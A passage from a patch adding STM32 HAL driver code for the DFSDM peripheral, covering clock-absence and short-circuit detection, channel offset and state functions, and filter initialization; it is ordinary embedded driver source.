DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + /* Get channel number from channel instance */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Clear clock absence flag */ + while((((filter0Instance->FLTISR & DFSDM_FLTISR_CKABF) >> (DFSDM_FLTISR_CKABF_Pos + channel)) & 1U) != 0U) + { + filter0Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + + /* Check the Timeout */ + if((HAL_GetTick()-tickstart) > DFSDM_CKAB_TIMEOUT) + { + /* Set timeout status */ + status = HAL_TIMEOUT; + break; + } + } +#else + /* Get channel number from channel instance */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Clear clock absence flag */ + while((((DFSDM1_Filter0->FLTISR & DFSDM_FLTISR_CKABF) >> (DFSDM_FLTISR_CKABF_Pos + channel)) & 1U) != 0U) + { + DFSDM1_Filter0->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + + /* Check the Timeout */ + if((HAL_GetTick()-tickstart) > DFSDM_CKAB_TIMEOUT) + { + /* Set timeout status */ + status = HAL_TIMEOUT; + break; + } + } +#endif /* DFSDM2_Channel0 */ + + if(status == HAL_OK) + { + /* Start clock absence detection */ + hdfsdm_channel->Instance->CHCFGR1 |= DFSDM_CHCFGR1_CKABEN; + } + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to poll for the clock absence detection. + * @param hdfsdm_channel DFSDM channel handle. + * @param Timeout Timeout value in milliseconds. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelPollForCkab(DFSDM_Channel_HandleTypeDef *hdfsdm_channel, + uint32_t Timeout) +{ + uint32_t tickstart; + uint32_t channel; +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + return HAL_ERROR; + } + else + { +#if defined(DFSDM2_Channel0) + + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + + /* Get channel number from channel instance */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Wait clock absence detection */ + while((((filter0Instance->FLTISR & DFSDM_FLTISR_CKABF) >> (DFSDM_FLTISR_CKABF_Pos + channel)) & 1U) == 0U) + { + /* Check the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U) || ((HAL_GetTick()-tickstart) > Timeout)) + { + /* Return timeout status */ + return HAL_TIMEOUT; + } + } + } + + /* Clear clock absence detection flag */ + filter0Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); +#else + /* Get channel number from channel instance */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Wait clock absence detection */ + while((((DFSDM1_Filter0->FLTISR & DFSDM_FLTISR_CKABF) >> (DFSDM_FLTISR_CKABF_Pos + channel)) & 1U) == 0U) + { + /* Check the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if(((HAL_GetTick()-tickstart) > Timeout) || (Timeout == 0U)) + { + /* Return timeout status */ + return HAL_TIMEOUT; + } + } + } + + /* Clear clock absence detection flag */ + DFSDM1_Filter0->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); +#endif /* defined(DFSDM2_Channel0) */ + /* Return function status */ + return HAL_OK; + } +} + +/** + * @brief This function allows to stop clock absence detection in polling mode. + * @param hdfsdm_channel DFSDM channel handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelCkabStop(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t channel; +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { +#if defined(DFSDM2_Channel0) + + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + + /* Stop clock absence detection */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_CKABEN); + + /* Clear clock absence flag */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + filter0Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + +#else + /* Stop clock absence detection */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_CKABEN); + + /* Clear clock absence flag */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + DFSDM1_Filter0->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); +#endif /* DFSDM2_Channel0 */ + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start clock absence detection in interrupt mode. + * @note Same mode has to be used for all channels. + * @note If clock is not available on this channel during 5 seconds, + * clock absence detection will not be activated and function + * will return HAL_TIMEOUT error. + * @param hdfsdm_channel DFSDM channel handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelCkabStart_IT(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t channel; + uint32_t tickstart; +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { +#if defined(DFSDM2_Channel0) + + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + + /* Get channel number from channel instance */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Clear clock absence flag */ + while((((filter0Instance->FLTISR & DFSDM_FLTISR_CKABF) >> (DFSDM_FLTISR_CKABF_Pos + channel)) & 1U) != 0U) + { + filter0Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + + /* Check the Timeout */ + if((HAL_GetTick()-tickstart) > DFSDM_CKAB_TIMEOUT) + { + /* Set timeout status */ + status = HAL_TIMEOUT; + break; + } + } + + if(status == HAL_OK) + { + /* Activate clock absence detection interrupt */ + filter0Instance->FLTCR2 |= DFSDM_FLTCR2_CKABIE; + + /* Start clock absence detection */ + hdfsdm_channel->Instance->CHCFGR1 |= DFSDM_CHCFGR1_CKABEN; + } +#else + /* Get channel number from channel instance */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Clear clock absence flag */ + while((((DFSDM1_Filter0->FLTISR & DFSDM_FLTISR_CKABF) >> (DFSDM_FLTISR_CKABF_Pos + channel)) & 1U) != 0U) + { + DFSDM1_Filter0->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + + /* Check the Timeout */ + if((HAL_GetTick()-tickstart) > DFSDM_CKAB_TIMEOUT) + { + /* Set timeout status */ + status = HAL_TIMEOUT; + break; + } + } + + if(status == HAL_OK) + { + /* Activate clock absence detection interrupt */ + DFSDM1_Filter0->FLTCR2 |= DFSDM_FLTCR2_CKABIE; + + /* Start clock absence detection */ + hdfsdm_channel->Instance->CHCFGR1 |= DFSDM_CHCFGR1_CKABEN; + } + +#endif /* defined(DFSDM2_Channel0) */ + } + /* Return function status */ + return status; +} + +/** + * @brief Clock absence detection callback. + * @param hdfsdm_channel DFSDM channel handle. + * @retval None + */ +__weak void HAL_DFSDM_ChannelCkabCallback(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_channel); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DFSDM_ChannelCkabCallback could be implemented in the user file + */ +} + +/** + * @brief This function allows to stop clock absence detection in interrupt mode. + * @note Interrupt will be disabled for all channels + * @param hdfsdm_channel DFSDM channel handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelCkabStop_IT(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t channel; +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { +#if defined(DFSDM2_Channel0) + + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + + /* Stop clock absence detection */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_CKABEN); + + /* Clear clock absence flag */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + filter0Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + + /* Disable clock absence detection interrupt */ + filter0Instance->FLTCR2 &= ~(DFSDM_FLTCR2_CKABIE); +#else + + /* Stop clock absence detection */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_CKABEN); + + /* Clear clock absence flag */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + DFSDM1_Filter0->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + + /* Disable clock absence detection interrupt */ + DFSDM1_Filter0->FLTCR2 &= ~(DFSDM_FLTCR2_CKABIE); +#endif /* DFSDM2_Channel0 */ + } + + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start short circuit detection in polling mode. + * @note Same mode has to be used for all channels + * @param hdfsdm_channel DFSDM channel handle. + * @param Threshold Short circuit detector threshold. + * This parameter must be a number between Min_Data = 0 and Max_Data = 255. + * @param BreakSignal Break signals assigned to short circuit event. + * This parameter can be a values combination of @ref DFSDM_BreakSignals. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelScdStart(DFSDM_Channel_HandleTypeDef *hdfsdm_channel, + uint32_t Threshold, + uint32_t BreakSignal) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + assert_param(IS_DFSDM_CHANNEL_SCD_THRESHOLD(Threshold)); + assert_param(IS_DFSDM_BREAK_SIGNALS(BreakSignal)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Configure threshold and break signals */ + hdfsdm_channel->Instance->CHAWSCDR &= ~(DFSDM_CHAWSCDR_BKSCD | DFSDM_CHAWSCDR_SCDT); + hdfsdm_channel->Instance->CHAWSCDR |= ((BreakSignal << DFSDM_CHAWSCDR_BKSCD_Pos) | \ + Threshold); + + /* Start short circuit detection */ + hdfsdm_channel->Instance->CHCFGR1 |= DFSDM_CHCFGR1_SCDEN; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to poll for the short circuit detection. + * @param hdfsdm_channel DFSDM channel handle. + * @param Timeout Timeout value in milliseconds. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelPollForScd(DFSDM_Channel_HandleTypeDef *hdfsdm_channel, + uint32_t Timeout) +{ + uint32_t tickstart; + uint32_t channel; +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + return HAL_ERROR; + } + else + { + /* Get channel number from channel instance */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + +#if defined(DFSDM2_Channel0) + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Wait short circuit detection */ + while(((filter0Instance->FLTISR & DFSDM_FLTISR_SCDF) >> (DFSDM_FLTISR_SCDF_Pos + channel)) == 0U) + { + /* Check the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U) || ((HAL_GetTick()-tickstart) > Timeout)) + { + /* Return timeout status */ + return HAL_TIMEOUT; + } + } + } + + /* Clear short circuit detection flag */ + filter0Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRSCDF_Pos + channel)); + +#else + /* Get timeout */ + tickstart = HAL_GetTick(); + + /* Wait short circuit detection */ + while(((DFSDM1_Filter0->FLTISR & DFSDM_FLTISR_SCDF) >> (DFSDM_FLTISR_SCDF_Pos + channel)) == 0U) + { + /* Check the Timeout */ + if(Timeout != HAL_MAX_DELAY) + { + if(((HAL_GetTick()-tickstart) > Timeout) || (Timeout == 0U)) + { + /* Return timeout status */ + return HAL_TIMEOUT; + } + } + } + + /* Clear short circuit detection flag */ + DFSDM1_Filter0->FLTICR = (1U << (DFSDM_FLTICR_CLRSCDF_Pos + channel)); +#endif /* DFSDM2_Channel0 */ + + /* Return function status */ + return HAL_OK; + } +} + +/** + * @brief This function allows to stop short circuit detection in polling mode. + * @param hdfsdm_channel DFSDM channel handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelScdStop(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t channel; +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Stop short circuit detection */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_SCDEN); + + /* Clear short circuit detection flag */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); + +#if defined(DFSDM2_Channel0) + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + + filter0Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRSCDF_Pos + channel)); +#else + DFSDM1_Filter0->FLTICR = (1U << (DFSDM_FLTICR_CLRSCDF_Pos + channel)); +#endif /* DFSDM2_Channel0*/ + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start short circuit detection in interrupt mode. + * @note Same mode has to be used for all channels + * @param hdfsdm_channel DFSDM channel handle. + * @param Threshold Short circuit detector threshold. + * This parameter must be a number between Min_Data = 0 and Max_Data = 255. + * @param BreakSignal Break signals assigned to short circuit event. + * This parameter can be a values combination of @ref DFSDM_BreakSignals. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelScdStart_IT(DFSDM_Channel_HandleTypeDef *hdfsdm_channel, + uint32_t Threshold, + uint32_t BreakSignal) +{ + HAL_StatusTypeDef status = HAL_OK; +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + assert_param(IS_DFSDM_CHANNEL_SCD_THRESHOLD(Threshold)); + assert_param(IS_DFSDM_BREAK_SIGNALS(BreakSignal)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { +#if defined(DFSDM2_Channel0) + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + /* Activate short circuit detection interrupt */ + filter0Instance->FLTCR2 |= DFSDM_FLTCR2_SCDIE; +#else + /* Activate short circuit detection interrupt */ + DFSDM1_Filter0->FLTCR2 |= DFSDM_FLTCR2_SCDIE; +#endif /* DFSDM2_Channel0 */ + + /* Configure threshold and break signals */ + hdfsdm_channel->Instance->CHAWSCDR &= ~(DFSDM_CHAWSCDR_BKSCD | DFSDM_CHAWSCDR_SCDT); + hdfsdm_channel->Instance->CHAWSCDR |= ((BreakSignal << DFSDM_CHAWSCDR_BKSCD_Pos) | \ + Threshold); + + /* Start short circuit detection */ + hdfsdm_channel->Instance->CHCFGR1 |= DFSDM_CHCFGR1_SCDEN; + } + /* Return function status */ + return status; +} + +/** + * @brief Short circuit detection callback. + * @param hdfsdm_channel DFSDM channel handle. + * @retval None + */ +__weak void HAL_DFSDM_ChannelScdCallback(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_channel); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DFSDM_ChannelScdCallback could be implemented in the user file + */ +} + +/** + * @brief This function allows to stop short circuit detection in interrupt mode. + * @note Interrupt will be disabled for all channels + * @param hdfsdm_channel DFSDM channel handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelScdStop_IT(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t channel; +#if defined(DFSDM2_Channel0) + DFSDM_Filter_TypeDef* filter0Instance; +#endif /* defined(DFSDM2_Channel0) */ + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Stop short circuit detection */ + hdfsdm_channel->Instance->CHCFGR1 &= ~(DFSDM_CHCFGR1_SCDEN); + + /* Clear short circuit detection flag */ + channel = DFSDM_GetChannelFromInstance(hdfsdm_channel->Instance); +#if defined(DFSDM2_Channel0) + /* Get channel counter, channel handle table and channel 0 instance */ + if(IS_DFSDM1_CHANNEL_INSTANCE(hdfsdm_channel->Instance)) + { + filter0Instance = DFSDM1_Filter0; + } + else + { + filter0Instance = DFSDM2_Filter0; + } + + filter0Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRSCDF_Pos + channel)); + + /* Disable short circuit detection interrupt */ + filter0Instance->FLTCR2 &= ~(DFSDM_FLTCR2_SCDIE); +#else + DFSDM1_Filter0->FLTICR = (1U << (DFSDM_FLTICR_CLRSCDF_Pos + channel)); + + /* Disable short circuit detection interrupt */ + DFSDM1_Filter0->FLTCR2 &= ~(DFSDM_FLTCR2_SCDIE); +#endif /* DFSDM2_Channel0 */ + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to get channel analog watchdog value. + * @param hdfsdm_channel DFSDM channel handle. + * @retval Channel analog watchdog value. + */ +int16_t HAL_DFSDM_ChannelGetAwdValue(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + return (int16_t) hdfsdm_channel->Instance->CHWDATAR; +} + +/** + * @brief This function allows to modify channel offset value. + * @param hdfsdm_channel DFSDM channel handle. + * @param Offset DFSDM channel offset. + * This parameter must be a number between Min_Data = -8388608 and Max_Data = 8388607. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_ChannelModifyOffset(DFSDM_Channel_HandleTypeDef *hdfsdm_channel, + int32_t Offset) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_CHANNEL_ALL_INSTANCE(hdfsdm_channel->Instance)); + assert_param(IS_DFSDM_CHANNEL_OFFSET(Offset)); + + /* Check DFSDM channel state */ + if(hdfsdm_channel->State != HAL_DFSDM_CHANNEL_STATE_READY) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Modify channel offset */ + hdfsdm_channel->Instance->CHCFGR2 &= ~(DFSDM_CHCFGR2_OFFSET); + hdfsdm_channel->Instance->CHCFGR2 |= ((uint32_t) Offset << DFSDM_CHCFGR2_OFFSET_Pos); + } + /* Return function status */ + return status; +} + +/** + * @} + */ + +/** @defgroup DFSDM_Exported_Functions_Group3_Channel Channel state function + * @brief Channel state function + * +@verbatim + ============================================================================== + ##### Channel state function ##### + ============================================================================== + [..] This section provides function allowing to: + (+) Get channel handle state. +@endverbatim + * @{ + */ + +/** + * @brief This function allows to get the current DFSDM channel handle state. + * @param hdfsdm_channel DFSDM channel handle. + * @retval DFSDM channel state. + */ +HAL_DFSDM_Channel_StateTypeDef HAL_DFSDM_ChannelGetState(DFSDM_Channel_HandleTypeDef *hdfsdm_channel) +{ + /* Return DFSDM channel handle state */ + return hdfsdm_channel->State; +} + +/** + * @} + */ + +/** @defgroup DFSDM_Exported_Functions_Group1_Filter Filter initialization and de-initialization functions + * @brief Filter initialization and de-initialization functions + * +@verbatim + ============================================================================== + ##### Filter initialization and de-initialization functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Initialize the DFSDM filter. + (+) De-initialize the DFSDM filter. +@endverbatim + * @{ + */ + +/** + * @brief Initialize the DFSDM filter according to the specified parameters + * in the DFSDM_FilterInitTypeDef structure and initialize the associated handle. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_FilterInit(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Check DFSDM Channel handle */ + if(hdfsdm_filter == NULL) + { + return HAL_ERROR; + } + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(IS_DFSDM_FILTER_REG_TRIGGER(hdfsdm_filter->Init.RegularParam.Trigger)); + assert_param(IS_FUNCTIONAL_STATE(hdfsdm_filter->Init.RegularParam.FastMode)); + assert_param(IS_FUNCTIONAL_STATE(hdfsdm_filter->Init.RegularParam.DmaMode)); + assert_param(IS_DFSDM_FILTER_INJ_TRIGGER(hdfsdm_filter->Init.InjectedParam.Trigger)); + assert_param(IS_FUNCTIONAL_STATE(hdfsdm_filter->Init.InjectedParam.ScanMode)); + assert_param(IS_FUNCTIONAL_STATE(hdfsdm_filter->Init.InjectedParam.DmaMode)); + assert_param(IS_DFSDM_FILTER_SINC_ORDER(hdfsdm_filter->Init.FilterParam.SincOrder)); + assert_param(IS_DFSDM_FILTER_OVS_RATIO(hdfsdm_filter->Init.FilterParam.Oversampling)); + assert_param(IS_DFSDM_FILTER_INTEGRATOR_OVS_RATIO(hdfsdm_filter->Init.FilterParam.IntOversampling)); + + /* Check parameters compatibility */ + if((hdfsdm_filter->Instance == DFSDM1_Filter0) && + ((hdfsdm_filter->Init.RegularParam.Trigger == DFSDM_FILTER_SYNC_TRIGGER) || + (hdfsdm_filter->Init.InjectedParam.Trigger == DFSDM_FILTER_SYNC_TRIGGER))) + { + return HAL_ERROR; + } +#if defined (DFSDM2_Channel0) + if((hdfsdm_filter->Instance == DFSDM2_Filter0) && + ((hdfsdm_filter->Init.RegularParam.Trigger == DFSDM_FILTER_SYNC_TRIGGER) || + (hdfsdm_filter->Init.InjectedParam.Trigger == DFSDM_FILTER_SYNC_TRIGGER))) + { + return HAL_ERROR; + } +#endif /* DFSDM2_Channel0 */ + + /* Initialize DFSDM filter variables with default values */ + hdfsdm_filter->RegularContMode = DFSDM_CONTINUOUS_CONV_OFF; + hdfsdm_filter->InjectedChannelsNbr = 1U; + hdfsdm_filter->InjConvRemaining = 1U; + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_NONE; + +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + /* Reset callback pointers to the weak predefined callbacks */ + hdfsdm_filter->AwdCallback = HAL_DFSDM_FilterAwdCallback; + hdfsdm_filter->RegConvCpltCallback = HAL_DFSDM_FilterRegConvCpltCallback; + hdfsdm_filter->RegConvHalfCpltCallback = HAL_DFSDM_FilterRegConvHalfCpltCallback; + hdfsdm_filter->InjConvCpltCallback = HAL_DFSDM_FilterInjConvCpltCallback; + hdfsdm_filter->InjConvHalfCpltCallback = HAL_DFSDM_FilterInjConvHalfCpltCallback; + hdfsdm_filter->ErrorCallback = HAL_DFSDM_FilterErrorCallback; + + /* Call MSP init function */ + if(hdfsdm_filter->MspInitCallback == NULL) + { + hdfsdm_filter->MspInitCallback = HAL_DFSDM_FilterMspInit; + } + hdfsdm_filter->MspInitCallback(hdfsdm_filter); +#else + /* Call MSP init function */ + HAL_DFSDM_FilterMspInit(hdfsdm_filter); +#endif + + /* Set regular parameters */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_RSYNC); + if(hdfsdm_filter->Init.RegularParam.FastMode == ENABLE) + { + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_FAST; + } + else + { + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_FAST); + } + + if(hdfsdm_filter->Init.RegularParam.DmaMode == ENABLE) + { + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_RDMAEN; + } + else + { + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_RDMAEN); + } + + /* Set injected parameters */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_JSYNC | DFSDM_FLTCR1_JEXTEN | DFSDM_FLTCR1_JEXTSEL); + if(hdfsdm_filter->Init.InjectedParam.Trigger == DFSDM_FILTER_EXT_TRIGGER) + { + assert_param(IS_DFSDM_FILTER_EXT_TRIG(hdfsdm_filter->Init.InjectedParam.ExtTrigger)); + assert_param(IS_DFSDM_FILTER_EXT_TRIG_EDGE(hdfsdm_filter->Init.InjectedParam.ExtTriggerEdge)); + hdfsdm_filter->Instance->FLTCR1 |= (hdfsdm_filter->Init.InjectedParam.ExtTrigger); + } + + if(hdfsdm_filter->Init.InjectedParam.ScanMode == ENABLE) + { + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_JSCAN; + } + else + { + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_JSCAN); + } + + if(hdfsdm_filter->Init.InjectedParam.DmaMode == ENABLE) + { + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_JDMAEN; + } + else + { + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_JDMAEN); + } + + /* Set filter parameters */ + hdfsdm_filter->Instance->FLTFCR &= ~(DFSDM_FLTFCR_FORD | DFSDM_FLTFCR_FOSR | DFSDM_FLTFCR_IOSR); + hdfsdm_filter->Instance->FLTFCR |= (hdfsdm_filter->Init.FilterParam.SincOrder | + ((hdfsdm_filter->Init.FilterParam.Oversampling - 1U) << DFSDM_FLTFCR_FOSR_Pos) | + (hdfsdm_filter->Init.FilterParam.IntOversampling - 1U)); + + /* Store regular and injected triggers and injected scan mode*/ + hdfsdm_filter->RegularTrigger = hdfsdm_filter->Init.RegularParam.Trigger; + hdfsdm_filter->InjectedTrigger = hdfsdm_filter->Init.InjectedParam.Trigger; + hdfsdm_filter->ExtTriggerEdge = hdfsdm_filter->Init.InjectedParam.ExtTriggerEdge; + hdfsdm_filter->InjectedScanMode = hdfsdm_filter->Init.InjectedParam.ScanMode; + + /* Enable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_DFEN; + + /* Set DFSDM filter to ready state */ + hdfsdm_filter->State = HAL_DFSDM_FILTER_STATE_READY; + + return HAL_OK; +} + +/** + * @brief De-initializes the DFSDM filter. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status. + */ +HAL_StatusTypeDef HAL_DFSDM_FilterDeInit(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Check DFSDM filter handle */ + 